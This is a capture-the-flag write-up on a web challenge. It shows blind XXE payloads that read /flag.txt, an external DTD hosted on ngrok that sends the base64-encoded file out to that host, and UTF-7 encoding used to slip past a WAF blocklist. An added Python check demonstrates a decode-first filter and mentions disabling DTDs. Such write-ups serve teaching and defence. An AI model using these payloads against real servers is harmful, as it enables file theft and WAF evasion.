Under Development
As the title says, this website isn't ready to go live yet ( ͡◉ ͜ʖ ͡◉)
Hint: Do you know about encoding formats? How many? If you do, let's wrap up this challenge.
Technical Report
When opening the website, the page is immediately redirected to login.php, which is a fake form. So in this case I used Burp Suite to see the actual content of index.php.
There's an interesting JavaScript function called sendmessage that sends XML to /send.php. The payload looks like this:
<?xml version="1.0"?>
<root>
<name>yudi</name>
<email>test@test.com</email>
<message>hello world!</message>
</root>
I also found another interesting link, to mybest.php.
On that page (mybest.php) I found another hint that says /flag.txt.
So I guessed that the XML endpoint we saw earlier could be used to retrieve the file /flag.txt. Let's try it using Insomnia with this payload:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]>
<root>&test;</root>
But there were two more issues:
- I got no output (it's blind)
- the WAF rejects requests containing !DOCTYPE, !ENTITY, !ELEMENT, file:// and .php
So I tried the out-of-band (OOB) method instead, making the parser load a remote resource. The payload:
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY % flag SYSTEM "http://075a05cf94ed.ngrok.io/dtd.xml">
%flag;
%all;
]>
<root>&send;</root>
dtd.xml (served from the ngrok host):
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/%file;'>">
Then I encoded the whole payload as UTF-7 to bypass the WAF, since the blocklist matches the raw bytes while the XML parser honours the encoding declared in the prolog. The final payload:
<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4
dtd.xml (served from the ngrok host):
<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-ENTITY +ACU file SYSTEM +ACI-php://filter/convert.base64-encode/resource=/flag.txt+ACIAPg
+ADwAIQ-ENTITY +ACU all +ACIAPAAh-ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/+ACU-file+ADs'+AD4AIgA+
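As an added illustration (not code from the writeup), this Python check shows the defensive side of the hint: a blocklist that matches raw bytes never sees "!DOCTYPE" in the UTF-7 payload above, while a filter that first decodes the body with the encoding declared in the XML prolog (as libxml does) catches it. The sample body is the writeup's final payload; the token list is the WAF's blocklist from the writeup.

```python
import codecs
import re

# Tokens the challenge's WAF blocked (taken from the writeup).
BLOCKED_TOKENS = ("!DOCTYPE", "!ENTITY", "!ELEMENT", "file://", ".php")

# Constructed sample: the writeup's UTF-7 payload exactly as a WAF receives it.
UTF7_PAYLOAD = b"""<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4
"""

# Encoding name from the XML declaration; only the first bytes are inspected.
_DECL_RE = re.compile(rb'<\?xml[^>]*encoding\s*=\s*["\']([A-Za-z0-9._-]+)["\']')


def declared_encoding(body, default="utf-8"):
    """Return the encoding the XML parser will use, lower-cased."""
    m = _DECL_RE.search(body[:256])
    return m.group(1).decode("ascii").lower() if m else default


def naive_filter_hits(body):
    """What a byte-level blocklist sees: the raw request body only."""
    return [t for t in BLOCKED_TOKENS if t.encode() in body]


def normalised_filter_hits(body):
    """Decode with the declared encoding first, then match (parser's view)."""
    enc = declared_encoding(body)
    try:
        text = codecs.decode(body, enc)
    except (LookupError, UnicodeDecodeError):
        # Unknown or malformed encoding: flag it rather than wave it through.
        return ["undecodable-body"]
    return [t for t in BLOCKED_TOKENS if t in text]


if __name__ == "__main__":
    print("raw-byte blocklist hits:", naive_filter_hits(UTF7_PAYLOAD))        # []
    print("decoded blocklist hits: ", normalised_filter_hits(UTF7_PAYLOAD))   # DOCTYPE/ENTITY/ELEMENT
```

Normalising the body is only a WAF-side mitigation; the application-side fix is to disable DTD processing and external entity loading in the XML parser so that no encoding trick matters.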
FLAG: ara2021{ezzz_pz_lemon_sqzzzz}